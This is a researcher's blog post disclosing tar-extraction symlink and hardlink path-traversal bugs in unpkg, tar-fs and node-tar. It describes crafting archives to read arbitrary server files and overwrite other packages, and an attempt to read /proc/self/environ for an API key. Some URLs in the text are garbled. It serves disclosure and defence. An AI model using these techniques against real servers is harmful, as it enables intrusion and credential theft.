When you request a URL like
https://firstname.lastname@example.org/, unpkg checks if it already has the package downloaded and extracted at
/tmp/unpkg-react-16.3.2/. If it doesn’t, it pulls the corresponding tar file from npm.
Unpkg lets you read any file out of a package once it’s extracted. To serve react’s
package.json file, for example, you can just visit https://email@example.com/package.json. Or, to get a directory listing of the whole package, you can visit https://firstname.lastname@example.org/.
Here’s a snippet of what unpkg used to extract the tar file when it pulled a package:
The first problem with this code is that it doesn’t actually ignore symlinks like it says it does. With this tar library, the
header.type for a symlink entry is
link. So right away this gives us arbitrary file reads on the server by creating a symlink to
/ and browsing through the directory with the web interface.
The second problem with this code is that even if
headers.type did correctly check for
symlink, the main attack below still worked due to issues with the tar library’s implementation of
First exploit attempt
On my local instance of unpkg, I was able to use this bug to read
/proc/self/environ, which would spit out the environment variables of the webserver process. In these environment variables is a Cloudflare API key which I was thinking an attacker could use to do nefarious DNS-related things with their API (this was an untested assumption – I don’t know if Cloudflare supports restricting the permissions on their API keys).
Unfortunately (fortunately?), something about Heroku’s environment made it so that I couldn’t read
/proc/self/environ on the real unpkg server. My guess is that this had to do with the incorrect HTTP
Content-Length returned by the server. When reading the
/proc/self/environ, my local instance reported
Content-Length: 0, but still returned the file in the response body. My guess is that some reasonably clever reverse proxy at Heroku sees the
Content-Length: 0 and cuts out the body of the reply.
The reason the server returns
Content-Length: 0 is because
stat /proc/self/environ returns a size of 0, and that’s what unpkg uses to set that header.
Second exploit attempt
At this point I was kind of bummed that I couldn’t figure out a way to take over this server. I went ahead and reported the symlink issue to the unpkg maintainer and went to sleep.
But then I started thinking more about tar files. We can extract files into a folder, we can create symlinks… can we extract files into a directory pointed to by a symlink that’s already been extracted? I pulled out my hex editor and made a tar file that tries this. It creates a symlink to
link, and then tries to extract a file to
I figured there is no way this would work with any mature tar implementation, and sure enough this fails to extract on my laptop:
$ tar -xvf symlink-oops.tar
tar: exploit/link/oops.txt: Cannot open: Not a directory
tar: Exiting with failure status due to previous errors
But unpkg doesn’t use GNU Tar, it uses a package called
tar-fs happily extracts this archive.
And then we win! Since we can write (and overwrite) files anywhere that the webserver user is able to do so, we can overwrite files in the directories set aside for other packages, like
/tmp/unpkg-react-16.3.2/. To test this out, I made two versions of a package, and had the second version overwrite files in the first (it worked).
A worse bug than I thought
Many tar implementations also support unpacking hardlinks. Since creating a hardlink to a directory is more often than not an invalid operation, I made a variant of my original exploit that would:
- Make a hardlink
footo a file I knew should exist and
- Unpack a regular file named
foowith arbitrary contents
tar-fs was vulnerable to this attack as well and would allow me to overwrite files as long as I had the proper permissions and knew where they lived on the filesystem.
After reporting this variant of the original bug to the
tar-fs maintainer, he got back to me the next morning sounding a little worried. Surprisingly,
node-tar, a much more popular tar library, was vulnerable to the hardlink variant. The
tar-fs maintainer and I submitted a bug report and
node-tar was quickly patched as well.
Oh, and if you ever need a textbook example of defense-in-depth doing its job, just remember that the only reason the npm client (which uses
pacote and thus
node-tar) wasn’t vulnerable to this attack was because a
pacote developer made the prescient decision to never extract hardlinks or softlinks.
If you’re interested in ditching #birdsite and want to use a social network that actually respects your freedoms, you should consider joining Mastodon! It’s a federated social network, meaning that it works in a distributed way sort of like email. Join us over in the fediverse and help us build a friendly security community!